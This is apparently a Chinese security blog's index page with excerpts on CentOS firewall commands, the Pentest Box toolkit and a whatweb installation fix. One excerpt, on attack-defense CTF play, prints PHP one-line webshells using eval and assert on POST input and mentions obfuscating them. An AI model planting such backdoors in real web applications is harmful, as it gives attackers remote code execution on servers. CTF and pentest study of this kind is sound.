图图家

逆风的方向更适合飞翔,我不怕万人阻挡,只怕自己投降!

centos 查看和关闭防火墙

查看防火墙的状态的命令为:sudo systemctl status firewalld。打开防火墙的方式有两种,一种是打开后重启会恢复回原来的状态,命令为:sudo systemctl start firewalld;另一种是打开后重启不会恢复到原来的状态,命令为:sudo systemctl enable firewalld,这种方式输入命令后要重启系统才会生效。关闭防火墙的方式也有两种...

Richar March 24, 2020 暂无评论

Pentest BOX安装和使用

0x01 Pentest BOXPentest Box:渗透测试盒子,是一款Windows平台下预配置的便携式开源渗透测试环境,而它也是著名黑客Kapustkiy常用的工具之一。这里集成的大都是Linux下的工具,Kali Linux上面的常用的很多工具这里面也都集成了。它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。Pentest...

Richar December 9, 2019 暂无评论

AWD模式下的各类PHP木马

经典一句话木马最最常见的PHP木马,经典,但也满足不了我们的需求,很容易被大佬识破<?php @eval($_POST["cmd"]); ?> <?php @assert($_POST['cmd']);?>     混淆马:让木马内容难以识别<?php assert($_POST[-7]); ?> 变换成<?php        ...

Richar December 6, 2019 暂无评论

PentestBox中部分工具整理

漏洞利用工具:clusterd - inclusterd是一个开源应用服务器攻击工具包。clusterd自动化识别应用服务器的指纹,侦察和利用。 jexboss - JexBoss是一个用于测试和利用JBoss Application Server漏洞的工具。 信息收集:cangibrina - Cangibrina是一个多平台工具,旨在通过wordlist,google,nmap和robo...

Richar October 17, 2019 暂无评论

pentestbox 下安装whatweb后,报IPADDR模块没有配置的解决办法。

pentestbox 下安装whatweb后,报IPADDR模块没有配置,无法运行(whatweb安装过程略)查阅网络无果,根据提示,进到whatweb安装目录如D:\PentestBox\bin\customtools\webApplications\whatweb\:,执行D:\PentestBox\bin\customtools\webApplications\whatweb\plug...

Richar October 16, 2019 暂无评论